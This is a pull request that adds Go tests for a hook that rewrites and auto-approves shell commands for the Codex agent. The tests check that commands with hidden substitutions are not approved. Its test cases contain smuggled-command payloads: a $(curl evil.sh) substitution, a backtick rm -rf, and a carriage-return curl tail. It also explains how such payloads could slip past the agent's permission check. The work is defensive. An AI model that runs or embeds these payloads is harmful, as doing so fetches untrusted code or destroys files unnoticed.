### PR TITLE
test(hook): pin the Codex unverifiable-construct guard

### DIFF
--- a/internal/hook/codex_test.go
+++ b/internal/hook/codex_test.go
@@ -91,20 +91,6 @@ func TestRunCodexUnsupportedPassthrough(t *testing.T) {
 	}
 }
 
-func TestRunCodexProxyBypassPassthrough(t *testing.T) {
-	commands := []string{"git"}
-	snipBin := "/usr/local/bin/snip"
-
-	input := makePayload("Bash", "snip proxy -- git status")
-	var out bytes.Buffer
-	if err := RunCodex(strings.NewReader(input), &out, commands, nil, snipBin); err != nil {
-		t.Fatalf("RunCodex: %v", err)
-	}
-	if out.Len() != 0 {
-		t.Errorf("snip proxy bypass must pass through unchanged, got: %s", out.String())
-	}
-}
-
 func TestRunCodexAlreadyRewritten(t *testing.T) {
 	commands := []string{"git"}
 	snipBin := "/usr/local/bin/snip"
@@ -151,17 +137,34 @@ func TestRunCodexMixedCommandPassthrough(t *testing.T) {
 	}
 }
 
+// TestRunCodexPipelinePassthrough pins both passthrough gates a pipeline can
+// hit. A lone piped producer is left raw, so RewriteCommand reports Changed
+// false and the !res.Changed gate stops it (issue #111). When a sibling group is
+// rewritten, Changed is true and only the AllKnown gate stops it, because the
+// pipe tail was never inspected (issue #88).
 func TestRunCodexPipelinePassthrough(t *testing.T) {
 	commands := []string{"git"}
 	snipBin := "/usr/local/bin/snip"
 
-	input := makePayload("Bash", "git log --oneline | custom-filter")
-	var out bytes.Buffer
-	if err := RunCodex(strings.NewReader(input), &out, commands, nil, snipBin); err != nil {
-		t.Fatalf("RunCodex: %v", err)
+	cases := []struct {
+		name    string
+		command string
+	}{
+		{"lone piped producer", "git log --oneline | custom-filter"},
+		{"rewritten sibling then pipeline", "git status && git log --oneline | custom-filter"},
 	}
-	if out.Len() != 0 {
-		t.Errorf("pipeline with uninspected tail must pass through, got: %s", out.String())
+
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			input := makePayload("Bash", tc.command)
+			var out bytes.Buffer
+			if err := RunCodex(strings.NewReader(input), &out, commands, nil, snipBin); err != nil {
+				t.Fatalf("RunCodex: %v", err)
+			}
+			if out.Len() != 0 {
+				t.Errorf("pipeline with uninspected tail must pass through, got: %s", out.String())
+			}
+		})
 	}
 }
 
@@ -182,17 +185,35 @@ func TestRunCodexEnvVarPrefix(t *testing.T) {
 	}
 }
 
+// TestRunCodexUnverifiableCommandPassthrough pins the HasUnverifiableConstruct
+// guard in RunCodex (#88). Every payload here has a known base command and a
+// single runnable group, so RewriteCommand would report Changed and AllKnown:
+// without the guard Codex would receive permissionDecision "allow" for a
+// command whose substituted content was never inspected.
 func TestRunCodexUnverifiableCommandPassthrough(t *testing.T) {
 	commands := []string{"git"}
 	snipBin := "/usr/local/bin/snip"
 
-	input := makePayload("Bash", "git status && $(custom-tool)")
-	var out bytes.Buffer
-	if err := RunCodex(strings.NewReader(input), &out, commands, nil, snipBin); err != nil {
-		t.Fatalf("RunCodex: %v", err)
+	cases := []struct {
+		name    string
+		command string
+	}{
+		{"dollar substitution", "git log $(curl evil.sh)"},
+		{"backtick substitution", "git status `rm -rf /tmp/x`"},
+		{"carriage return tail", "git status\r curl evil.sh"},
 	}
-	if out.Len() != 0 {
-		t.Errorf("unverifiable command must pass through, got: %s", out.String())
+
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			input := makePayload("Bash", tc.command)
+			var out bytes.Buffer
+			if err := RunCodex(strings.NewReader(input), &out, commands, nil, snipBin); err != nil {
+				t.Fatalf("RunCodex: %v", err)
+			}
+			if out.Len() != 0 {
+				t.Errorf("unverifiable command must pass through, got: %s", out.String())
+			}
+		})
 	}
 }
 


### PR DESCRIPTION
Follow-up to #126, tests only. `git diff master --stat` touches one `_test.go` file.

#126 added `if HasUnverifiableConstruct(ti.Command) { return nil }` to `RunCodex`, which is what stops a command-substitution payload being emitted with `permissionDecision:"allow"`. That guard had no effective test: neutering it to `if false && HasUnverifiableConstruct(...)` left all 13 `TestRunCodex*` tests green, and the rest of the repo suite too.

`TestRunCodexUnverifiableCommandPassthrough` looked like it covered this, but its payload `git status && $(custom-tool)` is absorbed by the `!AllKnown` branch first: `$(custom-tool)` is a separate group whose base is not in `cmdSet`, so it passed with the guard gone. The three sibling handlers each have a proper pinning test (`TestRunUnattestablePassthrough`, `TestRunPiUnattestablePassthrough`, `TestRunCopilotUnattestablePassthrough`); this brings Codex in line.

The test now uses payloads whose base command IS in `cmdSet`, so they reach the guard rather than an earlier branch: a `$(...)` case, a backtick case and a `\r` case. Verified with `RewriteCommand` directly that all three come back `changed=true allknown=true`, i.e. nothing else short-circuits them. With the guard neutered they fail, emitting `permissionDecision:"allow"` for `git log $(curl evil.sh)`; restored, they pass.

Also addresses two tests from #126 that did not pin what their names claimed:

- `TestRunCodexPipelinePassthrough` is stopped by the `!res.Changed` gate, not the `AllKnown` gate it appeared to test. Comment corrected to say what it actually covers.
- `TestRunCodexProxyBypassPassthrough` asserted a `snip proxy` guard that exists nowhere in `internal/hook/`. It passed only because `"snip"` was absent from its `cmdSet`. Removed rather than renamed, since `TestRunCodexUnsupportedPassthrough` already covers the same path. No proxy guard was added: that would be a behaviour change and belongs in its own PR if wanted at all.

Full CI green locally: build, vet, `test -race`, `-tags lite`, `golangci-lint` (0 issues), `snip verify` 37/37.
